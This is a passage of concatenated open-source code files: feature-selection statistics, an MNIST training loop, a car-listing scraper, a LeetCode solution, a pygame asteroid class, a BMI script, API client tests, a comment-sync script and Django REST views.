d1[target].mean()\n\n data['d_g'] = (data['all'] - data['bad']) / (data['all'] - data['bad']).sum()\n\n data['d_b'] = data['bad'] / data['bad'].sum()\n\n data['woe'] = lb.np.log(data['d_g'] / data['d_b'])\n\n data = data.replace({'woe': {lb.np.inf: 0, -lb.np.inf: 0}})\n\n data['iv'] = data['woe'] * (data['d_g'] - data['d_b'])\n\n data.insert(0, 'variable', feature)\n\n data.insert(1, 'value', data.index)\n\n data.index = range(len(data))\n\n iv = data['iv'].sum()\n\n if pr:\n\n print(data)\n\n print('IV = %s' % iv)\n\n return iv\n\n\ndef iv_features_drop(df, target, threshold):\n\n columns_list = df.columns.tolist()\n\n iv_features_list = [] \n\n for column in columns_list:\n\n column_data_type = df.dtypes[column]\n\n if column != target:\n\n iv = calc_iv_single_feature(df, column, target, pr=False)\n\n if iv <= threshold:\n\n df = df.drop([column], axis = 1)\n\n iv_features_list.append(column)\n\n df_iv_features = lb.pd.DataFrame(iv_features_list, columns = ['iv_features_drop']) \n\n return (df, df_iv_features) \n\n\ndef psi(score_initial, score_new, num_bins = 10, mode = 'quantile'):\n \n eps = 1e-4\n\n if len(set(score_initial)) < num_bins + 1:\n\n num_bins = 1\n\n # Sort the data\n score_initial.sort()\n\n score_new.sort()\n \n # Prepare the bins\n min_val = min(min(score_initial), min(score_new))\n\n max_val = max(max(score_initial), max(score_new))\n\n if mode == 'fixed':\n\n bins = [min_val + (max_val - min_val)*(i)/num_bins for i in range(num_bins+1)]\n\n elif mode == 'quantile':\n\n bins = lb.pd.qcut(score_initial, q = num_bins, retbins = True)[1] # Create the quantiles based on the initial population\n\n else:\n\n raise ValueError(f\"Mode \\'{mode}\\' not recognized. Your options are \\'fixed\\' and \\'quantile\\'\")\n\n bins[0] = min_val - eps # Correct the lower boundary\n\n bins[-1] = max_val + eps # Correct the higher boundary\n \n \n # Bucketize the initial population and count the sample inside each bucket\n\n bins_initial = lb.pd.cut(score_initial, bins = bins, labels = range(1,num_bins+1))\n\n df_initial = lb.pd.DataFrame({'initial': score_initial, 'bin': bins_initial})\n\n grp_initial = df_initial.groupby('bin').count()\n\n grp_initial['percent_initial'] = grp_initial['initial'] / sum(grp_initial['initial'])\n \n # Bucketize the new population and count the sample inside each bucket\n bins_new = lb.pd.cut(score_new, bins = bins, labels = range(1,num_bins+1))\n\n df_new = lb.pd.DataFrame({'new': score_new, 'bin': bins_new})\n\n grp_new = df_new.groupby('bin').count()\n\n grp_new['percent_new'] = grp_new['new'] / sum(grp_new['new'])\n \n # Compare the bins to calculate PSI\n psi_df = grp_initial.join(grp_new, on = \"bin\", how = \"inner\")\n\n \n # Add a small value for when the percent is zero\n psi_df['percent_initial'] = psi_df['percent_initial'].apply(lambda x: eps if x == 0 else x)\n\n psi_df['percent_new'] = psi_df['percent_new'].apply(lambda x: eps if x == 0 else x)\n \n # Calculate the psi\n psi_df['psi'] = (psi_df['percent_initial'] - psi_df['percent_new']) * lb.np.log(psi_df['percent_initial'] / psi_df['percent_new'])\n \n # Return the psi values\n return psi_df['psi'].values\n\n '''\n example to use this function \n for col in df.columns.tolist():\n\n csi_values = psi(df['age'].values, 1.01*(df['age'].values), mode = 'quantile')\n\n print (lb.np.mean(csi_values))\n '''\n\n\ndef psi_features_drop(df, target, time_threshold, cut_off_threshold):\n\n columns_list = df.columns.tolist()\n\n psi_features_list = []\n\n for column in columns_list:\n\n column_data_type = df.dtypes[column]\n\n if column != target:\n\n initial = lb.np.array(df.loc[:int(df.shape[0]*time_threshold), column].values)\n\n new = lb.np.array(df.loc[int(df.shape[0]*time_threshold):, column].values)\n\n psi_values_list = psi(initial, new, ps.BIN_NUM, mode = 'quantile')\n\n if lb.np.mean(psi_values_list) > cut_off_threshold:\n\n df = df.drop([column], axis = 1)\n\n psi_features_list.append(column)\n \n df_psi_features = lb.pd.DataFrame(psi_features_list, columns = ['psi_features_drop'])\n\n return (df, df_psi_features)\n","repo_name":"zzwtgts/mlflow_automation","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14937350739","text":"from data import MINSTdataSet\nfrom net import netV1\nfrom torch.utils.data import DataLoader\nimport torch, torch.optim\nfrom torch.utils.tensorboard import SummaryWriter\nimport time, warnings\nwarnings.filterwarnings('ignore')\n\nDEVICE = 'cuda:0' # 设备上可能有多个多个显卡,0表示显卡序列\n\nclass train:\n '''\n 训练模型,梯度下降过程\n '''\n\n def __init__(self, root):\n '''\n 模型的准备工作,如加载数据集和网络模型,定义损失,优化器,\n :param root: data中获取数据集的地址\n '''\n\n # 把所有数据的地址加载进来\n self.train_dataset = MINSTdataSet(root)\n # 按批次在数据集中加载数据\n self.train_dataloder = DataLoader(self.train_dataset, batch_size=100, shuffle=True, num_workers=8)\n\n # 加载验证集\n self.test_dataset = MINSTdataSet(root, is_train=False)\n self.test_dataloader = DataLoader(self.test_dataset, batch_size=100, shuffle=False, num_workers=0)\n\n # 定义网络\n self.net = netV1()\n\n # 加载已经存在的参数\n if self.net.load_state_dict(torch.load(\"checkpoint/40.apk\")):\n self.net.load_state_dict(torch.load(\"checkpoint/40.apk\"))\n\n # 将网���放到 GPU 上面去,在参数 加载完成后执行\n self.net.to(DEVICE)\n\n # 定义优化器\n self.optim = torch.optim.Adam(self.net.parameters())\n\n def __call__(self):\n '''\n 实例化的时候就会调用 call 如 train_moid = train() train_moid()\n 实现后向学习\n :param args:\n :param kwargs:\n :return:\n '''\n # 打开tensorboard 打开cmd切换到项目文件路径下,执行tensorboard --logdir=ligs, 浏览器打开 localhost:6006\n self.summarywriter = SummaryWriter('./logs')\n\n for epoch in range(10000):\n\n train_ts = time.time()\n train_sum_loss = 0\n for i, (img, tage)in enumerate(self.train_dataloder):\n # 这一轮就把六万张图片训练完成了,\n # 把数据和标签放入GPU进行计算, pytorch的张量放到CUDA上直接 张量.cuda 或者 张量.to(DEVICE)\n input, tage = img.to(DEVICE), tage.to(DEVICE)\n out = self.net(input)\n loss = torch.mean((out - tage) ** 2)\n\n self.optim.zero_grad()\n # 这儿的损失是在GPU上算的\n loss.backward()\n self.optim.step()\n\n # item 计算的是python的标量,不可以放到CUDA上计算,所以要转为cpu上计算\n train_sum_loss += loss.cpu().detach().item()\n train_avg_loss =train_sum_loss/ len(self.train_dataloder)\n train_te = time.time()\n train_time = train_te - train_ts\n\n # 验证\n test_sum_loss = 0\n test_ts = time.time()\n score_sum = 0\n for i, (img, tage) in enumerate(self.test_dataloader):\n # 把数据个标签放入GPU进行计算\n input, test_tage = img.to(DEVICE), tage.to(DEVICE)\n test_output = self.net(input)\n loss = torch.mean((test_output - test_tage) ** 2)\n test_sum_loss += loss.cpu().item()\n\n # 将输出转化为 one_hot\n # index_testout = torch.argmax(test_output, dim=1, keepdim=True)\n # test_output = test_output.scatter_(1, index_testout, 1)\n # score_sum += torch.sum(torch.eq(test_output, test_tage).float())\n\n pre_tage = torch.argmax(test_output, dim=1)\n label_tage = torch.argmax(test_tage,dim=1)\n score_sum +=torch.sum(torch.eq(pre_tage, label_tage).float())\n\n test_avg_loss = loss.item() / len(self.test_dataloader)\n test_te = time.time()\n test_time = test_te - test_ts\n score_avg = score_sum / len(self.test_dataset)\n\n # add_scalars用来保存多个值, add_scalar只能保存一个\n self.summarywriter.add_scalars(\"loss\", {\"train_avg_loss\":train_avg_loss, \"test_avg_loss\":test_avg_loss}, epoch)\n self.summarywriter.add_scalar(\"score\", score_avg, epoch)\n\n # 保存网络参数 w, b,不会自动创建文件 需要先将文件夹创建出来,按轮次保存,保存的格式为 .apk 或则 .t 文件 为二进制文件\n # 防止出现意外情况,保留参数\n torch.save(self.net.state_dict(), f\"./checkpoint/{epoch}.apk\")\n print(epoch, train_avg_loss, train_time, test_avg_loss, test_time, score_avg.item())\nif __name__ == '__main__':\n train = train(\"data/MNIST_IMG\")\n train()\n\n # x = torch.tensor([[0.2, 0.22, 0.12, 0.78],\n # [0.2, 0.22, 0.82, 0.78],\n # [0.92, 0.22, 0.12, 0.78]])\n # h = torch.tensor([[0,0,0,1],\n # [0,0,1,0],\n # [0,0,0,1]])\n #\n # y = torch.argmax(x, dim=1, keepdim=True )\n # print(y)\n # # z = torch.zeros(x.shape).scatter_(1, y, 1)\n # z = x.scatter_(1, y, 1)\n # print(z)\n #\n # score_sum = torch.sum(torch.eq(h, z).float())\n # # score_sum = torch.eq(h, z)\n # print(score_sum/3)\n # print(torch.cuda.is_available())","repo_name":"urnotmo/MINST","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33897845288","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom lxml import html\nimport csv\n\n\nclass hatla2eeScraper:\n def __init__(self):\n self.url = 'https://eg.hatla2ee.com/en/car'\n self.optionsUrl = 'https://eg.hatla2ee.com/en/carSell/model?Brand='\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; \"\n \"x64; rv:66.0) \"\n \"Gecko/20100101 Firefox/66.0\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept\": \"text/html,application/xhtml+xml,\"\n \"application/xml;q=0.9,*/*;q=0.8\",\n }\n self.cars = []\n self.cars.append(['make', 'model', 'year'])\n\n def getMakes(self):\n try:\n request = requests.get(url=self.url, headers=self.headers)\n request.encoding = \"utf-8\"\n html = request.text\n carMainPage = BeautifulSoup(html, \"lxml\")\n makeSelect = carMainPage.find('select', id='make')\n self.makes = []\n skip = 1\n for option in makeSelect.find_all('option'):\n if skip == 1:\n skip = 0\n continue\n make = []\n make.append(option['value'])\n make.append(option.text)\n self.makes.append(make)\n except Exception as e:\n print(e)\n exit(1)\n\n def getModels(self, makeCode, makeName):\n try:\n url = self.optionsUrl + makeCode\n request = requests.get(url=url, headers=self.headers)\n request.encoding = \"utf-8\"\n html = request.text\n makeOptions = BeautifulSoup(html, \"lxml\")\n skip = 1\n for option in makeOptions.find_all('option'):\n if skip == 1:\n skip = 0\n continue\n for i in range(1991,2021):\n car = []\n car.append(makeName)\n car.append(option.text)\n car.append(i)\n self.cars.append(car)\n except Exception as e:\n print(e)\n exit(1)\n\nif __name__ == \"__main__\":\n scraper = hatla2eeScraper()\n scraper.getMakes()\n skip = 1\n for make in scraper.makes:\n #skip headers row\n if skip == 1:\n skip=0\n continue\n scraper.getModels(make[0],make[1])\n with open('cars.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerows(scraper.cars)\n","repo_name":"milror00/hatla2eeScraper","sub_path":"app/hatla2eeScraper.py","file_name":"hatla2eeScraper.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878961128","text":"# link : https://leetcode.com/problems/combination-sum-ii/description/\n# author : Mohamed Ibrahim\n\n\nclass Solution :\n\n def combinationSum2(self, candidates, target):\n candidates.sort() \n result = []\n self.combine_sum_2(candidates, 0, [], result, target)\n return result\n \n def combine_sum_2(self, nums, start, path, result, target):\n\n if target == 0:\n result.append(path)\n return\n \n for i in range(start, len(nums)):\n if i > start and nums[i] == nums[i - 1]:\n continue\n if nums[i] > target:\n break\n self.combine_sum_2(nums, i + 1, path + [nums[i]], result, target - nums[i])\n\n\n\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"LeetCode/40. Combination Sum II.py","file_name":"40. Combination Sum II.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"39301985458","text":"import pygame\nimport random\n\nlargura = 700\naltura = 700\n\nclass Asteroide:\n def __init__(self, tamanho, x, y):\n self._tamanho = tamanho\n\n if self.tamanho == 3:\n self._asteroide_imagem = pygame.image.load('asteroide3.png')\n elif self.tamanho == 2:\n self._asteroide_imagem = pygame.image.load('asteroide2.png')\n elif self.tamanho == 1:\n self._asteroide_imagem = pygame.image.load('asteroide1.png')\n\n self._asteroide_obj = self.asteroide_imagem.get_rect()\n self._velocidade = 1\n\n self.asteroide_obj.centerx = x\n self.asteroide_obj.centery = y\n\n self.direcao_asteroide = random.randrange(0, 360, 45)\n\n @property\n def tamanho(self):\n return self._tamanho\n\n @property\n def asteroide_imagem(self):\n return self._asteroide_imagem\n\n @property\n def asteroide_obj(self):\n return self._asteroide_obj\n\n @property\n def velocidade(self):\n return self._velocidade\n\n def asteroide_saiu_tela(self):\n x, y = self.pegar_asteroide_posicao()\n\n if x <= 0: x = largura\n elif x > largura + 10: x = 1\n\n if y <= 0: y = altura\n elif y > altura + 10: y = 1\n\n self.colocar_asteroide_posicao(x, y)\n\n def asteroide_trajetoria(self):\n self.asteroide_saiu_tela()\n\n if self.direcao_asteroide == 0 or self.direcao_asteroide == 360: self.asteroide_movimentar(0, -self.velocidade)\n elif self.direcao_asteroide == 45: self.asteroide_movimentar(-self.velocidade, -self.velocidade)\n elif self.direcao_asteroide == 90: self.asteroide_movimentar(-self.velocidade, 0)\n elif self.direcao_asteroide == 135: self.asteroide_movimentar(-self.velocidade, self.velocidade)\n elif self.direcao_asteroide == 180: self.asteroide_movimentar(0, self.velocidade)\n elif self.direcao_asteroide == 225: self.asteroide_movimentar(self.velocidade, self.velocidade)\n elif self.direcao_asteroide == 270: self.asteroide_movimentar(self.velocidade, 0)\n elif self.direcao_asteroide == 315: self.asteroide_movimentar(self.velocidade, -self.velocidade)\n\n def asteroide_movimentar(self, x, y):\n self.asteroide_obj.move_ip(x, y)\n\n def colocar_asteroide_tela(self, superficie):\n superficie.blit(self.asteroide_imagem, self.asteroide_obj)\n\n def pegar_asteroide_posicao(self):\n return self.asteroide_obj.center\n\n def colocar_asteroide_posicao(self, x, y):\n self.asteroide_obj.center = x, y","repo_name":"rodolfobolconte/jogo-star-asteroids-wars","sub_path":"asteroide.py","file_name":"asteroide.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20751957862","text":"height = input('請輸入身高(公分): ')\nweight = input('請輸入體重(公斤): ')\n\nheight = float(height)\nweight = float(weight)\n\nbmi = weight/((height/100)*(height/100))\n\nif bmi < 18.5:\n\tprint('體重過輕')\nelif bmi >= 18.5 and bmi < 24:\n\tprint('正常')\nelif bmi >= 24 and bmi < 27:\n\tprint('過重')\nelif bmi >= 27 and bmi < 30:\n\tprint('輕度肥胖')\nelif bmi >= 30 and bmi < 35:\n\tprint('中度肥胖')\nelse:\n\tprint('重度肥胖')","repo_name":"abuju0525/bmi","sub_path":"bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41129498717","text":"class Pessoa():\n def __init__(self, nome, idade, prof):\n self.nome = nome\n self.idade = idade\n self.prof = prof\n def saudacao(self):\n print(f'Oi, meu nome é {self.nome}, tenho {self.idade} anos e sou {self.prof}.')\npedro = Pessoa('Pedro', 25, 'reporter')\npedro.saudacao()\n\nguilherme = Pessoa('Guilherme', 18, 'estudante')\nguilherme.saudacao()\n\newe = Pessoa('Ewewlyn', 18, 'estudante')\newe.saudacao()\n\n \n ","repo_name":"GustaGitDev/FabricaDeSoftware","sub_path":"Poo/pessoa.py","file_name":"pessoa.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72319709609","text":"# coding=utf-8\nimport json\nfrom http.client import InvalidURL\nfrom urllib.parse import parse_qs, urlsplit\n\nimport pytest\nfrom asynctest import CoroutineMock\n\nfrom acme.api import Api\nfrom acme.errors.api import ApiError\n\n\ndef test_call_api_with_inexistent_path(api):\n with pytest.raises(InvalidURL):\n api.foo()\n\n\ndef test_build_url(api, config):\n path = 'purchases_by_user'\n params = {\n 'limit': 10,\n 'games': 'yes'\n }\n user = 'some_user'\n\n url = api._build_url(path, params, username=user)\n\n # We can't simply test if url == 'expected_url' because the query\n # parameters may not be in the order we assume, so let's break it\n # apart and test each component individually.\n\n parsed = urlsplit(url)\n\n assert parsed.path == '/api/' + api._paths[path].format(username=user)\n\n p = parse_qs(parsed.query)\n assert p == {'limit': ['10'], 'games': ['yes']}\n\n result = parsed.scheme + '://' + parsed.netloc + '/api/'\n assert result == config['API_BASE_URL']\n\n\ndef test_build_url_with_no_params(api):\n \"\"\"\n If no query string parameters are passed, the resulting URL should\n have none either.\n \"\"\"\n\n url = api._build_url('purchases_by_user', username='foo')\n\n parsed = urlsplit(url)\n\n p = parse_qs(parsed.query)\n assert p == {}\n\n\nasync def test_cache(config, http, cache):\n \"\"\"\n Make sure an API method, when called more than once with the same\n parameters, only results in one HTTP call, since the second time it\n gets the data from the cache.\n \"\"\"\n http.get = CoroutineMock()\n text = '{}'\n http.get.return_value = {'status': 200, 'text': text}\n api = Api(config, http, cache)\n\n user = 'some_user'\n params = {'limit': 10}\n\n await api.purchases_by_user(params, username=user)\n await api.purchases_by_user(params, username=user)\n\n path = api._paths['purchases_by_user'].format(username=user)\n url = config['API_BASE_URL'] + path + '?limit=10'\n api.http.get.assert_called_once_with(url)\n\n\nasync def test_failing_api_call(config, http, cache):\n http.get = CoroutineMock()\n http.get.return_value = {'status': 500}\n api = Api(config, http, cache)\n\n product_id = 10\n params = {'limit': 10}\n\n with pytest.raises(ApiError):\n await api.purchases_by_product(params, product_id=product_id)\n\n\nasync def test_purchases_by_user(config, http, cache):\n \"\"\"\n I will only test this API method since the others all run the same\n code and the HTTP call result is mocked by me. Thus, it doesnt' make\n much sense to test all the methods unless I were to test the real\n API, which returns different results for each of the methods.\n \"\"\"\n http.get = CoroutineMock()\n text = '{}'\n http.get.return_value = {'status': 200, 'text': text}\n api = Api(config, http, cache)\n\n user = 'some_user'\n params = {'limit': 10}\n\n result = await api.purchases_by_user(params, username=user)\n\n assert result == json.loads(text)\n\n path = api._paths['purchases_by_user'].format(username=user)\n url = config['API_BASE_URL'] + path + '?limit=10'\n api.http.get.assert_called_with(url)\n","repo_name":"borfast/acmemegastore","sub_path":"test/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5109578268","text":"# coding:utf-8\nimport init_environ\nimport datetime,time\n\nfrom apps.common.utils.utils_log import log\nfrom apilib import QNApp\nfrom apps.web.models import AppComment\nfrom apps.common.models import Config\n\ndef get_comment_by_date(date, page, app):\n \"\"\"获取某一天的所有5分好评\"\"\"\n tapi = QNApp.init_tapi(None)\n temp_list, comment_list = [], []\n result = tapi.fuwu_sale_scores_get(current_page = page, page_size = 100, date = date)\n if result and result.score_result and result.score_result.score_result:\n temp_list = result.score_result.score_result\n for comment in temp_list:\n if comment.avg_score == '5.0':\n comment_list.append(comment)\n return comment_list\n\ndef save_comment(comment_dict):\n \"\"\"保存评论\"\"\"\n app_comment = AppComment()\n app_comment.id = comment_dict['id']\n app_comment.avg_score = comment_dict['avg_score']\n app_comment.suggestion = comment_dict['suggestion'] if 'suggestion' in comment_dict else ''\n app_comment.service_code = comment_dict['service_code'] if 'service_code' in comment_dict else ''\n app_comment.user_nick = comment_dict['user_nick'] if 'user_nick' in comment_dict else ''\n app_comment.gmt_create = comment_dict['gmt_create']\n app_comment.item_code = comment_dict['item_code'] if 'item_code' in comment_dict else ''\n app_comment.item_name = comment_dict['item_name'] if 'item_name' in comment_dict else ''\n app_comment.is_pay = comment_dict['is_pay'] if 'is_pay' in comment_dict else ''\n app_comment.is_recommend = 0\n app_comment.save()\n\ndef get_history_comment(app):\n \"\"\"获取历史的某一天至今的好评\"\"\"\n key = 'web.SYNC_WEB_COMMENT' if app == 'web' else 'web.SYNC_QN_COMMENT'\n cfg = Config.objects.get(key = key)\n today = datetime.date.today()\n cur_date_count = 0\n date = datetime.datetime.strptime(cfg.value, '%Y-%m-%d').date()\n page = 1\n now_date = time.strftime(\"%Y-%m-%d\", time.localtime())\n while date<=today:\n try:\n comment_list = get_comment_by_date(date, page, app)\n comment_id_list = [comment.id for comment in comment_list]\n # 首先检查数据库中有没有这些评论,若有则无需保存\n temp_id_list = AppComment.objects.filter(id__in=comment_id_list).values_list('id', flat=True)\n for comment in comment_list:\n comment_dict = comment.to_dict()\n if 'suggestion' in comment_dict and comment_dict['suggestion'] and comment_dict['id'] not in temp_id_list:\n cur_date_count += 1\n save_comment(comment_dict)\n if len(comment_list)<100:\n # 如果本次取得的数据条数小于100条,当天无更多评论,然后取下一天\n log.info('%s:%s有%s条新好评' % (date, app, cur_date_count))\n date = date + datetime.timedelta(days = 1)\n page = 1\n cur_date_count = 0\n else:\n #如果本次取得的数据条数等于100条,则有可能还有数据,需要取下一页数据\n page += 1\n except:\n log.info('同步评论出现异常,暂停10秒')\n time.sleep(10)\n # 每次取数据后暂停5秒\n time.sleep(3)\n cfg.value = now_date\n cfg.save()\n\ndef main():\n get_history_comment('web')\n get_history_comment('qn')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Florence3546/CRM","sub_path":"scripts/sync_app_comments.py","file_name":"sync_app_comments.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36214142420","text":"from rest_framework import pagination, serializers, status\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import mixins, generics, viewsets\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\n# from rest_framework.decorators import api_view\nfrom rest_framework.throttling import UserRateThrottle, AnonRateThrottle, ScopedRateThrottle\nfrom django_filters import rest_framework as filters\nfrom rest_framework import filters\nfrom watchlist_app.api.pagination import WatchListPagination, WatchListLOPagination, WatchListCursorPagination\nfrom watchlist_app.api.permissions import AdminorReadOnly, ReviewUserorReadOnly\nfrom watchlist_app.api.serializers import WatchListSerializer, StreamPlatformSerializer, ReviewSerializer\nfrom watchlist_app.models import WatchList, StreamPlatform, Review\nfrom watchlist_app.api.throttling import StreamPlatformThrottle\n\nimport logging\n\n# logger = logging.getLogger('django')\n\n\nlogger = logging.getLogger('django')\n# logger.setLevel(logging.DEBUG)\n\n# formatter = logging.Formatter('%(levelname)s:%(asctime)s:%(name)s:%(message)s')\n\n# file_handler = logging.FileHandler('logs/sample.log')\n# file_handler.setLevel(logging.ERROR)\n# file_handler.setFormatter(formatter)\n\n# stream_handler = logging.StreamHandler()\n# stream_handler.setFormatter(formatter)\n\n# logger.addHandler(file_handler)\n# logger.addHandler(stream_handler)\n\n# Class based views\n\nclass WatchListGV(generics.ListAPIView):\n queryset = WatchList.objects.all()\n serializer_class = WatchListSerializer\n pagination_class = WatchListCursorPagination\n # filter_backends = [filters.OrderingFilter]\n # ordering_fields = ['created']\n # ordering = ['number_rating']\n\n\n\nclass UserReviews(generics.ListAPIView):\n serializer_class = ReviewSerializer\n\n def get_queryset(self):\n # username = self.kwargs['username']\n username = self.request.query_params.get('username')\n\n return Review.objects.filter(review_user__username=username)\n\n\nclass StreamPlatformViewSet(viewsets.ModelViewSet):\n queryset = StreamPlatform.objects.all()\n serializer_class = StreamPlatformSerializer\n permission_classes = [IsAuthenticated]\n # throttle_classes = [StreamPlatformThrottle]\n throttle_scope = 'streaming'\n\n\n# class StreamPlatformVS(viewsets.ViewSet):\n\n# def list(self, request):\n# queryset = StreamPlatform.objects.all()\n# serializer = StreamPlatformSerializer(queryset, many=True)\n# return Response(serializer.data)\n\n# def retrieve(self, request, pk=None):\n# queryset = StreamPlatform.objects.all()\n# watchlist = get_object_or_404(queryset, pk=pk)\n# serializer = StreamPlatformSerializer(watchlist)\n# return Response(serializer.data)\n\n\n\nclass ReviewCreate(generics.CreateAPIView):\n serializer_class = ReviewSerializer\n\n def get_queryset(self):\n return Review.objects.all()\n\n def perform_create(self, serializer):\n pk = self.kwargs.get('pk')\n watchlist = WatchList.objects.get(pk=pk)\n\n review_user = self.request.user\n review_queryset = Review.objects.filter(watchlist=watchlist, review_user=review_user)\n\n if review_queryset.exists():\n raise ValidationError('You have reviewed already')\n\n if watchlist.number_rating == 0:\n watchlist.avg_rating = serializer.validated_data['rating']\n else:\n watchlist.avg_rating = (watchlist.avg_rating + serializer.validated_data['rating']) / 2\n \n watchlist.number_rating = watchlist.number_rating+ 1\n watchlist.save()\n\n serializer.save(watchlist=watchlist, review_user=review_user)\n\n\n\nclass ReviewList(generics.ListCreateAPIView):\n # queryset = Review.objects.all()\n serializer_class = ReviewSerializer\n # permission_classes = [IsAuthenticated]\n filter_backends = [filters.SearchFilter]\n # filterset_fields = ('review_user__username', 'active')\n search_fields = ['review_user__username', 'description']\n\n\n def get_queryset(self):\n pk = self.kwargs['pk']\n return Review.objects.filter(watchlist=pk)\n\n\n\nclass ReviewDetails(generics.RetrieveUpdateDestroyAPIView):\n queryset = Review.objects.all()\n serializer_class = ReviewSerializer\n permission_classes = [ReviewUserorReadOnly]\n\n\n\n# class ReviewDetail(mixins.RetrieveModelMixin, generics.GenericAPIView):\n# queryset = Review.objects.all()\n# serializer_class = ReviewSerializer\n\n# def get(self, request, *args, **kwargs):\n# return self.retrieve(request, *args, **kwargs)\n\n\n\n# class ReviewList(mixins.ListModelMixin,\n# mixins.CreateModelMixin,\n# generics.GenericAPIView):\n\n# queryset = Review.objects.all()\n# serializer_class = ReviewSerializer\n\n \n# def get(self, request, *args, **kwargs):\n# return self.list(request, *args, **kwargs)\n\n# def post(self, request, *args, **kwargs):\n# return self.create(request, *args, **kwargs)\n\n\n\nclass WatchListAV(APIView):\n\n def get(self, request):\n movies = WatchList.objects.all()\n serializer = WatchListSerializer(movies, many=True)\n logger.debug(serializer.data)\n return Response(serializer.data)\n\n\n def post(self, request):\n serializer = WatchListSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.info(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n logger.error(serializer.errors)\n return Response(serializer.errors)\n\n\nclass WatchDetailsAV(APIView):\n\n def get(self, request, pk):\n \n try:\n movie = WatchList.objects.get(pk=pk)\n except WatchList.DoesNotExist:\n content = {'error': 'Movie not found'}\n logger.error(content)\n return Response(content, status=status.HTTP_404_NOT_FOUND)\n \n serializer = WatchListSerializer(movie)\n logger.info('All watchlist names')\n logger.info(serializer.data)\n return Response(serializer.data)\n\n\n def put(self, request, pk):\n movie = WatchList.objects.get(pk=pk)\n serializer = WatchListSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.info(serializer.data)\n return Response(serializer.data)\n else:\n logger.error(serializer.errors)\n return Response(serializer.errors)\n\n\n def delete(self, request, pk):\n movie = WatchList.objects.get(pk=pk)\n movie.delete()\n content ={ 'response': 'deleted successfully' }\n return Response(content, status=status.HTTP_204_NO_CONTENT)\n\n\n\n# class StreamPlatformListAV(APIView):\n\n# def get(self, request):\n# stream_platforms = StreamPlatform.objects.all()\n# serializer = StreamPlatformSerializer(stream_platforms, many=True)\n# return Response(serializer.data)\n\n\n# def post(self, request):\n# serializer = StreamPlatformSerializer(data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data, status=status.HTTP_201_CREATED)\n# else:\n# return Response(serializer.errors)\n\n\n\n# class StreamPlatformDetailAV(APIView):\n\n# def get(self, request, pk):\n \n# try:\n# stream_platform = StreamPlatform.objects.get(pk=pk)\n# except StreamPlatform.DoesNotExist:\n# content = {'error': 'Movie not found'}\n# return Response(content, status=status.HTTP_404_NOT_FOUND)\n \n# serializer = StreamPlatformSerializer(stream_platform)\n# return Response(serializer.data)\n\n \n# def put(self, request, pk):\n# stream_platform = StreamPlatform.objects.get(pk=pk)\n# serializer = StreamPlatformSerializer(stream_platform, data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data)\n# else:\n# return Response(serializer.errors)\n\n \n# def delete(self, request, pk):\n# stream_platform = StreamPlatform.objects.get(pk=pk)\n# stream_platform.delete()\n# content ={ 'response': 'deleted successfully' }\n# return Response(content, status=status.HTTP_204_NO_CONTENT)\n\n\n\n# For adding the data and fetching all the data\n# Function based views\n# @api_view(['GET', 'POST'])\n# def movie_list(request):\n# if request.method == 'GET':\n# movies = Movie.objects.all()\n# serializer = MovieSerializer(movies, many=True)\n# return Response(serializer.data)\n \n# elif request.method == 'POST':\n# serializer = MovieSerializer(data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data, status=status.HTTP_201_CREATED)\n# else:\n# return Response(serializer.errors)\n\n# # For retrieving the single data, update and delete \n\n# @api_view(['GET', 'PUT', 'DELETE'])\n# def movie_details(request, pk):\n\n# try:\n# movie = Movie.objects.get(pk=pk)\n# except Movie.DoesNotExist:\n# content = {'error': 'Movie not found'}\n# return Response(content, status=status.HTTP_404_NOT_FOUND)\n\n\n# if request.method == 'GET':\n# movie = Movie.objects.get(pk=pk)\n# serializer = MovieSerializer(movie)\n# return Response(serializer.data)\n\n# elif request.method == 'PUT':\n# movie = Movie.objects.get(pk=pk)\n# serializer = MovieSerializer(movie, data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data)\n# else:\n# return Response(serializer.errors)\n \n# elif request.method == 'DELETE':\n# movie = Movie.objects.get(pk=pk)\n# movie.delete()\n# content ={ 'response': 'deleted successfully' }\n# return Response(content, 